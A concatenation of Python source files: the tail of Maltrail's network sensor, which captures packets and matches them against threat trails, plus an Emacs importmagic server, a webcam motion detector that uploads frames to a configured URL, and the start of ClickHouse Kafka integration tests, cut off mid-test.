if ord(ip_data[iph_length:iph_length + 1]) != 0x08: # Non-echo request
return
elif protocol == socket.IPPROTO_ICMPV6:
if ord(ip_data[iph_length:iph_length + 1]) != 0x80: # Non-echo request
return
if dst_ip in trails:
log_event((sec, usec, src_ip, '-', dst_ip, '-', IPPROTO_LUT[protocol], TRAIL.IP, dst_ip, trails[dst_ip][0], trails[dst_ip][1]), packet)
elif src_ip in trails:
log_event((sec, usec, src_ip, '-', dst_ip, '-', IPPROTO_LUT[protocol], TRAIL.IP, src_ip, trails[src_ip][0], trails[src_ip][1]), packet)
except struct.error:
pass
except Exception:
if config.SHOW_DEBUG:
traceback.print_exc()
def init():
"""
Performs sensor initialization
"""
global _multiprocessing
try:
import multiprocessing
if config.PROCESS_COUNT > 1 and not config.profile:
_multiprocessing = multiprocessing
except (ImportError, OSError, NotImplementedError):
pass
def update_timer():
retries = 0
if not config.no_updates:
while retries < CHECK_CONNECTION_MAX_RETRIES and not check_connection():
sys.stdout.write("[!] can't update because of lack of Internet connection (waiting..." if not retries else '.')
sys.stdout.flush()
time.sleep(10)
retries += 1
if retries:
print(")")
if config.no_updates or retries == CHECK_CONNECTION_MAX_RETRIES:
if retries == CHECK_CONNECTION_MAX_RETRIES:
print("[x] going to continue without online update")
_ = update_trails(offline=True)
else:
_ = update_trails()
update_ipcat()
if _:
trails.clear()
trails.update(_)
elif not trails:
_ = load_trails()
trails.update(_)
_regex = ""
for trail in trails:
if "static" in trails[trail][1]:
if re.search(r"[\].][*+]|\[[a-z0-9_.\-]+\]", trail, re.I):
try:
re.compile(trail)
except:
pass
else:
if re.escape(trail) != trail:
index = _regex.count("(?P<g")
if index < 100: # Reference: https://stackoverflow.com/questions/478458/python-regular-expressions-with-more-than-100-groups
_regex += "|(?P<g%s>%s)" % (index, trail)
trails._regex = _regex.strip('|')
thread = threading.Timer(config.UPDATE_PERIOD, update_timer)
thread.daemon = True
thread.start()
create_log_directory()
get_error_log_handle()
check_memory()
msg = "[i] using '%s' for trail storage" % config.TRAILS_FILE
if os.path.isfile(config.TRAILS_FILE):
mtime = time.gmtime(os.path.getmtime(config.TRAILS_FILE))
msg += " (last modification: '%s')" % time.strftime(HTTP_TIME_FORMAT, mtime)
print(msg)
update_timer()
if not config.DISABLE_CHECK_SUDO and check_sudo() is False:
exit("[!] please run '%s' with sudo/Administrator privileges" % __file__)
if config.plugins:
config.plugin_functions = []
for plugin in re.split(r"[,;]", config.plugins):
plugin = plugin.strip()
found = False
for _ in (plugin, os.path.join("plugins", plugin), os.path.join("plugins", "%s.py" % plugin)):
if os.path.isfile(_):
plugin = _
found = True
break
if not found:
exit("[!] plugin script '%s' not found" % plugin)
else:
dirname, filename = os.path.split(plugin)
dirname = os.path.abspath(dirname)
if not os.path.exists(os.path.join(dirname, '__init__.py')):
exit("[!] empty file '__init__.py' required inside directory '%s'" % dirname)
if not filename.endswith(".py"):
exit("[!] plugin script '%s' should have an extension '.py'" % filename)
if dirname not in sys.path:
sys.path.insert(0, dirname)
try:
module = __import__(filename[:-3].encode(sys.getfilesystemencoding()))
except (ImportError, SyntaxError) as msg:
exit("[!] unable to import plugin script '%s' (%s)" % (filename, msg))
found = False
for name, function in inspect.getmembers(module, inspect.isfunction):
if name == "plugin" and not set(inspect.getargspec(function).args) & set(("event_tuple', 'packet")):
found = True
config.plugin_functions.append(function)
function.__name__ = module.__name__
if not found:
exit("[!] missing function 'plugin(event_tuple, packet)' in plugin script '%s'" % filename)
if config.pcap_file:
for _ in config.pcap_file.split(','):
_caps.append(pcapy.open_offline(_))
else:
interfaces = set(_.strip() for _ in config.MONITOR_INTERFACE.split(','))
if (config.MONITOR_INTERFACE or "").lower() == "any":
if IS_WIN or "any" not in pcapy.findalldevs():
print("[x] virtual interface 'any' missing. Replacing it with all interface names")
interfaces = pcapy.findalldevs()
else:
print("[?] in case of any problems with packet capture on virtual interface 'any', please put all monitoring interfaces to promiscuous mode manually (e.g. 'sudo ifconfig eth0 promisc')")
for interface in interfaces:
if interface.lower() != "any" and re.sub(r"(?i)\Anetmap:", "", interface) not in pcapy.findalldevs():
hint = "[?] available interfaces: '%s'" % ",".join(pcapy.findalldevs())
exit("[!] interface '%s' not found\n%s" % (interface, hint))
print("[i] opening interface '%s'" % interface)
try:
_caps.append(pcapy.open_live(interface, SNAP_LEN, True, CAPTURE_TIMEOUT))
except (socket.error, pcapy.PcapError):
if "permitted" in str(sys.exc_info()[1]):
exit("[!] permission problem occurred ('%s')" % sys.exc_info()[1])
elif "No such device" in str(sys.exc_info()[1]):
exit("[!] no such device '%s'" % interface)
else:
raise
if config.LOG_SERVER and ':' not in config.LOG_SERVER:
exit("[!] invalid configuration value for 'LOG_SERVER' ('%s')" % config.LOG_SERVER)
if config.SYSLOG_SERVER and not len(config.SYSLOG_SERVER.split(':')) == 2:
exit("[!] invalid configuration value for 'SYSLOG_SERVER' ('%s')" % config.SYSLOG_SERVER)
if config.CAPTURE_FILTER:
print("[i] setting capture filter '%s'" % config.CAPTURE_FILTER)
for _cap in _caps:
try:
_cap.setfilter(config.CAPTURE_FILTER)
except:
pass
if _multiprocessing:
_init_multiprocessing()
if not IS_WIN and not config.DISABLE_CPU_AFFINITY:
try:
try:
mod = int(subprocess.check_output("grep -c ^processor /proc/cpuinfo", stderr=subprocess.STDOUT, shell=True).strip())
used = subprocess.check_output("for pid in $(ps aux | grep python | grep sensor.py | grep -E -o 'root[ ]*[0-9]*' | tr -d '[:alpha:] '); do schedtool $pid; done | grep -E -o 'AFFINITY .*' | cut -d ' ' -f 2 | grep -v 0xf", stderr=subprocess.STDOUT, shell=True).strip().split('\n')
max_used = max(int(_, 16) for _ in used)
affinity = max(1, (max_used << 1) % 2 ** mod)
except:
affinity = 1
p = subprocess.Popen("schedtool -n -2 -M 2 -p 10 -a 0x%02x %d" % (affinity, os.getpid()), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
_, stderr = p.communicate()
if "not found" in stderr:
msg, _ = "[?] please install 'schedtool' for better CPU scheduling", platform.linux_distribution()[0].lower()
for distro, install in {("fedora", "centos"): "sudo yum install schedtool", ("debian", "ubuntu"): "sudo apt-get install schedtool"}.items():
if _ in distro:
msg += " (e.g. '%s')" % install
break
print(msg)
except:
pass
def _init_multiprocessing():
"""
Inits worker processes used in multiprocessing mode
"""
global _buffer
global _n
if _multiprocessing:
print("[i] preparing capture buffer...")
try:
_buffer = mmap.mmap(-1, config.CAPTURE_BUFFER) # http://www.alexonlinux.com/direct-io-in-python
_ = b"\x00" * MMAP_ZFILL_CHUNK_LENGTH
for i in xrange(config.CAPTURE_BUFFER // MMAP_ZFILL_CHUNK_LENGTH):
_buffer.write(_)
_buffer.seek(0)
except KeyboardInterrupt:
raise
except:
exit("[!] unable to allocate network capture buffer. Please adjust value of 'CAPTURE_BUFFER'")
print("[i] creating %d more processes (out of total %d)" % (config.PROCESS_COUNT - 1, config.PROCESS_COUNT))
_n = _multiprocessing.Value('L', lock=False)
for i in xrange(config.PROCESS_COUNT - 1):
process = _multiprocessing.Process(target=worker, name=str(i), args=(_buffer, _n, i, config.PROCESS_COUNT - 1, _process_packet))
process.daemon = True
process.start()
def monitor():
"""
Sniffs/monitors given capturing interface
"""
print("[o] running...")
def packet_handler(datalink, header, packet):
global _count
ip_offset = None
try:
dlt_offset = DLT_OFFSETS[datalink]
except KeyError:
log_error("Received unexpected datalink (%d)" % datalink, single=True)
return
try:
if datalink == pcapy.DLT_RAW:
ip_offset = dlt_offset
elif datalink == pcapy.DLT_PPP:
if packet[2:4] in (b"\x00\x21", b"\x00\x57"): # (IPv4, IPv6)
ip_offset = dlt_offset
elif datalink == pcapy.DLT_NULL:
if packet[0:4] in (b"\x02\x00\x00\x00", b"\x23\x00\x00\x00"): # (IPv4, IPv6)
ip_offset = dlt_offset
elif dlt_offset >= 2:
if packet[dlt_offset - 2:dlt_offset] == b"\x81\x00": # VLAN
dlt_offset += 4
if packet[dlt_offset - 2:dlt_offset] in (b"\x08\x00", b"\x86\xdd"): # (IPv4, IPv6)
ip_offset = dlt_offset
except IndexError:
pass
if ip_offset is None:
return
try:
if six.PY3: # https://github.com/helpsystems/pcapy/issues/37#issuecomment-530795813
sec, usec = [int(_) for _ in ("%.6f" % time.time()).split('.')]
else:
sec, usec = header.getts()
if _multiprocessing:
block = struct.pack("=III", sec, usec, ip_offset) + packet
if _locks.count:
_locks.count.acquire()
write_block(_buffer, _count, block)
_n.value = _count = _count + 1
if _locks.count:
_locks.count.release()
else:
_process_packet(packet, sec, usec, ip_offset)
except socket.timeout:
pass
try:
def _(_cap):
global _done_count
datalink = _cap.datalink()
if six.PY3 and not config.pcap_file: # https://github.com/helpsystems/pcapy/issues/37#issuecomment-530795813
def _loop_handler(header, packet):
packet_handler(datalink, header, packet)
_cap.loop(-1, _loop_handler)
else:
while True:
success = False
try:
(header, packet) = _cap.next()
if header is not None:
success = True
packet_handler(datalink, header, packet)
elif config.pcap_file:
with _done_lock:
_done_count += 1
break
except (pcapy.PcapError, socket.timeout):
pass
if not success:
time.sleep(REGULAR_SENSOR_SLEEP_TIME)
if config.profile and len(_caps) == 1:
print("[=] will store profiling results to '%s'..." % config.profile)
_(_caps[0])
else:
if len(_caps) > 1:
if _multiprocessing:
_locks.count = threading.Lock()
_locks.connect_sec = threading.Lock()
for _cap in _caps:
threading.Thread(target=_, args=(_cap,)).start()
while _caps and not _done_count == (config.pcap_file or "").count(',') + 1:
time.sleep(1)
print("[i] all capturing interfaces closed")
except SystemError as ex:
if "error return without" in str(ex):
print("\r[x] stopping (Ctrl-C pressed)")
else:
raise
except KeyboardInterrupt:
print("\r[x] stopping (Ctrl-C pressed)")
finally:
print("\r[i] please wait...")
if _multiprocessing:
try:
for _ in xrange(config.PROCESS_COUNT - 1):
write_block(_buffer, _n.value, b"", BLOCK_MARKER.END)
_n.value = _n.value + 1
while _multiprocessing.active_children():
time.sleep(REGULAR_SENSOR_SLEEP_TIME)
except KeyboardInterrupt:
pass
if config.pcap_file:
flush_condensed_events(True)
def main():
for i in xrange(1, len(sys.argv)):
if sys.argv[i] == "-q":
sys.stdout = open(os.devnull, 'w')
if sys.argv[i] == "-i":
for j in xrange(i + 2, len(sys.argv)):
value = sys.argv[j]
if os.path.isfile(value):
sys.argv[i + 1] += ",%s" % value
sys.argv[j] = ''
else:
break
print("%s (sensor) #v%s\n" % (NAME, VERSION))
parser = optparse.OptionParser(version=VERSION)
parser.add_option("-c", dest="config_file", default=CONFIG_FILE, help="configuration file (default: '%s')" % os.path.split(CONFIG_FILE)[-1])
parser.add_option("-i", dest="pcap_file", help="open pcap file for offline analysis")
parser.add_option("-p", dest="plugins", help="plugin(s) to be used per event")
parser.add_option("-q", dest="quiet", action="store_true", help="turn off regular output")
parser.add_option("--console", dest="console", action="store_true", help="print events to console (Note: switch '-q' might be useful)")
parser.add_option("--no-updates", dest="no_updates", action="store_true", help="disable (online) trail updates")
parser.add_option("--debug", dest="debug", action="store_true", help=optparse.SUPPRESS_HELP)
parser.add_option("--profile", dest="profile", help=optparse.SUPPRESS_HELP)
options, _ = parser.parse_args()
read_config(options.config_file)
for option in dir(options):
if isinstance(getattr(options, option), (six.string_types, bool)) and not option.startswith('_'):
config[option] = getattr(options, option)
if options.debug:
config.console = True
config.PROCESS_COUNT = 1
config.SHOW_DEBUG = True
if options.pcap_file:
if options.pcap_file == '-':
print("[i] using STDIN")
else:
for _ in options.pcap_file.split(','):
if not os.path.isfile(_):
exit("[!] missing pcap file '%s'" % _)
print("[i] using pcap file(s) '%s'" % options.pcap_file)
if not config.DISABLE_CHECK_SUDO and not check_sudo():
exit("[!] please run '%s' with sudo/Administrator privileges" % __file__)
try:
init()
if config.profile:
open(config.profile, "w+b").write("")
cProfile.run("monitor()", config.profile)
else:
monitor()
except KeyboardInterrupt:
print("\r[x] stopping (Ctrl-C pressed)")
if __name__ == "__main__":
show_final = True
try:
main()
except SystemExit as ex:
show_final = False
if isinstance(get_ex_message(ex), six.string_types):
print(get_ex_message(ex))
os._exit(1)
except IOError:
show_final = False
log_error("\n\n[!] session abruptly terminated\n[?] (hint: \"https://stackoverflow.com/a/20997655\")")
except Exception:
msg = "\r[!] unhandled exception occurred ('%s')" % sys.exc_info()[1]
msg += "\n[x] please report the following details at 'https://github.com/stamparm/maltrail/issues':\n---\n'%s'\n---" % traceback.format_exc()
log_error("\n\n%s" % msg.replace("\r", ""))
print(msg)
finally:
if show_final:
print("[i] finished")
os._exit(0)
|
importmagicserver.py | # -*- coding: utf-8 -*-
"""
importmagic.el server
---------------------
Copyright (c) 2017 Nicolás Salas V.
Licensed under GPL3. See the LICENSE file for details
"""
import sexpdata
import sys
import threading
from collections import deque
import importmagic
from epc.server import EPCServer
server = EPCServer(('localhost', 0))
# We'll follow a very passive approach. I'm not really familiar with
# neither EPC or cl-lib. So please, don't expect to see a lot of
# quality in this code
index = None
# Since the transformation from Emacs Lisp to Python causes strings to
# be lists of separate characters, we need a function that can provide
# a regular string, which is this one.
def _stringify(input_param):
return ''.join(input_param)
# Take an input parameter which is a list of lists and convert it to a
# key: value dictionary, extracting the symbol value if necessary.
def _lists_to_dict(input_param):
def _value(item):
return item.value() if isinstance(item, sexpdata.Symbol) else item
if len(input_param) != 2: # there should only be 2 lists (keys and values)
return {}
else:
return dict(zip(map(_value, input_param[0]), # keys
map(_value, input_param[1]))) # values
# Construct the symbol index specified by the paths given. As the
# names suggest, these paths correspond to sys path and user_path. We
# still have to figure out if sys.path and user_path default values
# are ok.
def _build_index(sys_path=sys.path, user_path=None):
# since index is a global variable, need the global keyword. I did
# not know this
# http://stackoverflow.com/questions/423379/using-global-variables-in-a-function-other-than-the-one-that-created-them
global index
try:
paths = []
if user_path is not None:
if isinstance(user_path, list):
paths = paths + user_path
else:
paths.append(user_path)
if isinstance(sys_path, list):
paths = paths + sys_path
else:
paths.append(sys_path)
index = importmagic.SymbolIndex()
index.build_index(paths=paths)
except:
print('Failed to build index')
sys.exit(-1)
# Launch a thread that builds the index.
def build_index(sys_path=sys.path, user_path=None):
thread = threading.Thread(target=_build_index, args=(user_path, sys_path))
thread.daemon = True
thread.start()
# Returns a list of every unresolved symbol in source.
@server.register_function
def get_unresolved_symbols(*source):
source = _stringify(source)
scope = importmagic.Scope.from_source(source)
unres, unref = scope.find_unresolved_and_unreferenced_symbols()
return list(unres)
# Returns a list of candidates that can import the queried symbol. The
# returned list is ordered by score, meaning that the first element is
# more likely to be appropriate.
@server.register_function
def get_candidates_for_symbol(*symbol):
symbol = _stringify(symbol)
candidates = deque([])
for score, module, variable in index.symbol_scores(symbol):
if variable is None:
fmt = 'import {}'.format(str(module))
else:
fmt = 'from {} import {}'.format(str(module), str(variable))
candidates.append(fmt)
return list(candidates)
# Takes a list where the firest element is the source file as a string
# (assuming the call is from elisp) and the second element is the
# chosen import statement.
@server.register_function
def get_import_statement(source, import_statement, style):
style = _lists_to_dict(style)
imports = importmagic.importer.Imports(index, source)
if style:
imports.set_style(**style)
if import_statement.startswith('import '):
module = import_statement[7:]
imports.add_import(module)
else:
separator = import_statement.find(' import ')
module = import_statement[5:separator]
if separator >= 0:
imports.add_import_from(import_statement[5:separator],
import_statement[(separator + 8):])
start, end, new_statement = imports.get_update()
return [start, end, new_statement]
# Adds the specified path to symbol index.
@server.register_function
def add_path_to_index(*path):
path = _stringify(path)
global index
if index is None:
return "Index not ready. Hang on a second."
index.build_index([path])
return 0
build_index()
server.print_port()
server.serve_forever()
|
motion_detector.py | from threading import Thread
from queue import Queue
import numpy as np
import cv2
import requests
import json
import os, time
with open('config.json', 'r') as f:
config = json.load(f)
sd_thresh = config['detection']['threshold']
upload_url = config['upload']['url']
uid = config['upload']['uid']
skip_frames = config['detection']['skip_frames']
frame_queue = Queue()
def dist_map(frame1, frame2):
frame1_32 = np.float32(frame1)
frame2_32 = np.float32(frame2)
diff32 = frame1_32 - frame2_32
norm32 = np.sqrt(diff32[:, :, 0] ** 2 + diff32[:, :, 1] ** 2 + diff32[:, :, 2] ** 2) / np.sqrt(
255 ** 2 + 255 ** 2 + 255 ** 2)
dist = np.uint8(norm32 * 255)
return dist
def send_frame():
while True:
frame = frame_queue.get()
print("Sending")
_, image = cv2.imencode('.jpg', frame)
requests.post(upload_url, files={'img': ('frame.jpg', image, 'image/jpeg')}, data={'uid': uid})
worker = Thread(target=send_frame)
worker.setDaemon(True)
worker.start()
print("Trying to connect to the camera")
while True:
cap = cv2.VideoCapture(0)
if cap is None or not cap.isOpened():
print("Retrying to connect")
time.sleep(5)
else:
print("Connected")
break
cap.set(cv2.CAP_PROP_FPS, config['capture']['fps'])
_, frame1 = cap.read()
_, frame2 = cap.read()
skip_count = 0
while True:
try:
_, frame3 = cap.read()
rows, cols, _ = np.shape(frame3)
dist = dist_map(frame1, frame3)
frame1 = frame2
frame2 = frame3
except ValueError:
print("Restarting Script")
os.system("python motion_detector.py")
mod = cv2.GaussianBlur(dist, (9, 9), 0)
_, thresh = cv2.threshold(mod, 100, 255, 0)
_, stDev = cv2.meanStdDev(mod)
if stDev > sd_thresh:
if skip_count == skip_frames:
skip_count = 0
frame_queue.put(frame2)
else:
skip_count += 1
if cv2.waitKey(1) & 0xFF == 27:
break
cap.release()
cv2.destroyAllWindows()
|
test.py | import os.path as p
import random
import threading
import time
import pytest
from helpers.cluster import ClickHouseCluster
from helpers.test_tools import TSV
from helpers.client import QueryRuntimeException
import json
import subprocess
import kafka.errors
from kafka import KafkaAdminClient, KafkaProducer, KafkaConsumer
from google.protobuf.internal.encoder import _VarintBytes
"""
protoc --version
libprotoc 3.0.0
# to create kafka_pb2.py
protoc --python_out=. kafka.proto
"""
import kafka_pb2
# TODO: add test for run-time offset update in CH, if we manually update it on Kafka side.
# TODO: add test for SELECT LIMIT is working.
# TODO: modify tests to respect `skip_broken_messages` setting.
cluster = ClickHouseCluster(__file__)
instance = cluster.add_instance('instance',
main_configs=['configs/kafka.xml'],
with_kafka=True,
clickhouse_path_dir='clickhouse_path')
kafka_id = ''
# Helpers
def check_kafka_is_available():
p = subprocess.Popen(('docker',
'exec',
'-i',
kafka_id,
'/usr/bin/kafka-broker-api-versions',
'--bootstrap-server',
'INSIDE://localhost:9092'),
stdout=subprocess.PIPE)
p.communicate()
return p.returncode == 0
def wait_kafka_is_available(max_retries=50):
retries = 0
while True:
if check_kafka_is_available():
break
else:
retries += 1
if retries > max_retries:
raise "Kafka is not available"
print("Waiting for Kafka to start up")
time.sleep(1)
def kafka_produce(topic, messages, timestamp=None):
producer = KafkaProducer(bootstrap_servers="localhost:9092")
for message in messages:
producer.send(topic=topic, value=message, timestamp_ms=timestamp)
producer.flush()
print ("Produced {} messages for topic {}".format(len(messages), topic))
def kafka_consume(topic):
consumer = KafkaConsumer(bootstrap_servers="localhost:9092", auto_offset_reset="earliest")
consumer.subscribe(topics=(topic))
for toppar, messages in consumer.poll(5000).items():
if toppar.topic == topic:
for message in messages:
yield message.value
consumer.unsubscribe()
consumer.close()
def kafka_produce_protobuf_messages(topic, start_index, num_messages):
data = ''
for i in range(start_index, start_index + num_messages):
msg = kafka_pb2.KeyValuePair()
msg.key = i
msg.value = str(i)
serialized_msg = msg.SerializeToString()
data = data + _VarintBytes(len(serialized_msg)) + serialized_msg
producer = KafkaProducer(bootstrap_servers="localhost:9092")
producer.send(topic=topic, value=data)
producer.flush()
print("Produced {} messages for topic {}".format(num_messages, topic))
# Since everything is async and shaky when receiving messages from Kafka,
# we may want to try and check results multiple times in a loop.
def kafka_check_result(result, check=False, ref_file='test_kafka_json.reference'):
fpath = p.join(p.dirname(__file__), ref_file)
with open(fpath) as reference:
if check:
assert TSV(result) == TSV(reference)
else:
return TSV(result) == TSV(reference)
# Fixtures
@pytest.fixture(scope="module")
def kafka_cluster():
try:
global kafka_id
cluster.start()
kafka_id = instance.cluster.kafka_docker_id
print("kafka_id is {}".format(kafka_id))
instance.query('CREATE DATABASE test')
yield cluster
finally:
cluster.shutdown()
@pytest.fixture(autouse=True)
def kafka_setup_teardown():
instance.query('DROP TABLE IF EXISTS test.kafka')
wait_kafka_is_available()
print("kafka is available - running test")
yield # run test
instance.query('DROP TABLE test.kafka')
# Tests
@pytest.mark.timeout(60)
def test_kafka_settings_old_syntax(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka('kafka1:19092', 'old', 'old', 'JSONEachRow', '\\n');
''')
# Don't insert malformed messages since old settings syntax
# doesn't support skipping of broken messages.
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce('old', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
@pytest.mark.timeout(60)
def test_kafka_settings_new_syntax(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'new',
kafka_group_name = 'new',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n',
kafka_skip_broken_messages = 1;
''')
messages = []
for i in range(25):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce('new', messages)
# Insert couple of malformed messages.
kafka_produce('new', ['}{very_broken_message,'])
kafka_produce('new', ['}another{very_broken_message,'])
messages = []
for i in range(25, 50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce('new', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
@pytest.mark.timeout(60)
def test_kafka_csv_with_delimiter(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'csv',
kafka_group_name = 'csv',
kafka_format = 'CSV',
kafka_row_delimiter = '\\n';
''')
messages = []
for i in range(50):
messages.append('{i}, {i}'.format(i=i))
kafka_produce('csv', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
@pytest.mark.timeout(60)
def test_kafka_tsv_with_delimiter(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'tsv',
kafka_group_name = 'tsv',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
''')
messages = []
for i in range(50):
messages.append('{i}\t{i}'.format(i=i))
kafka_produce('tsv', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
@pytest.mark.timeout(60)
def test_kafka_json_without_delimiter(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'json',
kafka_group_name = 'json',
kafka_format = 'JSONEachRow';
''')
messages = ''
for i in range(25):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce('json', [messages])
messages = ''
for i in range(25, 50):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce('json', [messages])
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
@pytest.mark.timeout(60)
def test_kafka_protobuf(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'pb',
kafka_group_name = 'pb',
kafka_format = 'Protobuf',
kafka_schema = 'kafka.proto:KeyValuePair';
''')
kafka_produce_protobuf_messages('pb', 0, 20)
kafka_produce_protobuf_messages('pb', 20, 1)
kafka_produce_protobuf_messages('pb', 21, 29)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
@pytest.mark.timeout(60)
def test_kafka_materialized_view(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'mv',
kafka_group_name = 'mv',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce('mv', messages)
while True:
result = instance.query('SELECT * FROM test.view')
if kafka_check_result(result):
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_check_result(result, True)
@pytest.mark.timeout(60)
def test_kafka_many_materialized_views(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view1;
DROP TABLE IF EXISTS test.view2;
DROP TABLE IF EXISTS test.consumer1;
DROP TABLE IF EXISTS test.consumer2;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'mmv',
kafka_group_name = 'mmv',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view1 (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE TABLE test.view2 (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer1 TO test.view1 AS
SELECT * FROM test.kafka;
CREATE MATERIALIZED VIEW test.consumer2 TO test.view2 AS
SELECT * FROM test.kafka;
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce('mmv', messages)
while True:
result1 = instance.query('SELECT * FROM test.view1')
result2 = instance.query('SELECT * FROM test.view2')
if kafka_check_result(result1) and kafka_check_result(result2):
break
instance.query('''
DROP TABLE test.consumer1;
DROP TABLE test.consumer2;
DROP TABLE test.view1;
DROP TABLE test.view2;
''')
kafka_check_result(result1, True)
kafka_check_result(result2, True)
@pytest.mark.timeout(300)
def test_kafka_flush_on_big_message(kafka_cluster):
# Create batchs of messages of size ~100Kb
kafka_messages = 1000
batch_messages = 1000
messages = [json.dumps({'key': i, 'value': 'x' * 100}) * batch_messages for i in range(kafka_messages)]
kafka_produce('flush', messages)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'flush',
kafka_group_name = 'flush',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 10;
CREATE TABLE test.view (key UInt64, value String)
ENGINE = MergeTree
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
client = KafkaAdminClient(bootstrap_servers="localhost:9092")
received = False
while not received:
try:
offsets = client.list_consumer_group_offsets('flush')
for topic, offset in offsets.items():
if topic.topic == 'flush' and offset.offset == kafka_messages:
received = True
break
except kafka.errors.GroupCoordinatorNotAvailableError:
continue
while True:
result = instance.query('SELECT count() FROM test.view')
if int(result) == kafka_messages*batch_messages:
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
assert int(result) == kafka_messages*batch_messages, 'ClickHouse lost some messages: {}'.format(result)
@pytest.mark.timeout(60)
def test_kafka_virtual_columns(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'virt1',
kafka_group_name = 'virt1',
kafka_format = 'JSONEachRow';
''')
messages = ''
for i in range(25):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce('virt1', [messages], 0)
messages = ''
for i in range(25, 50):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce('virt1', [messages], 0)
result = ''
while True:
result += instance.query('SELECT _key, key, _topic, value, _offset, _partition, _timestamp FROM test.kafka', ignore_error=True)
if kafka_check_result(result, False, 'test_kafka_virtual1.reference'):
break
kafka_check_result(result, True, 'test_kafka_virtual1.reference')
@pytest.mark.timeout(60)
def test_kafka_virtual_columns_with_materialized_view(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'virt2',
kafka_group_name = 'virt2',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64, kafka_key String, topic String, offset UInt64, partition UInt64, timestamp Nullable(DateTime))
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT *, _key as kafka_key, _topic as topic, _offset as offset, _partition as partition, _timestamp as timestamp FROM test.kafka;
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce('virt2', messages, 0)
while True:
result = instance.query('SELECT kafka_key, key, topic, value, offset, partition, timestamp FROM test.view')
if kafka_check_result(result, False, 'test_kafka_virtual2.reference'):
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_check_result(result, True, 'test_kafka_virtual2.reference')
@pytest.mark.timeout(60)
def test_kafka_insert(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
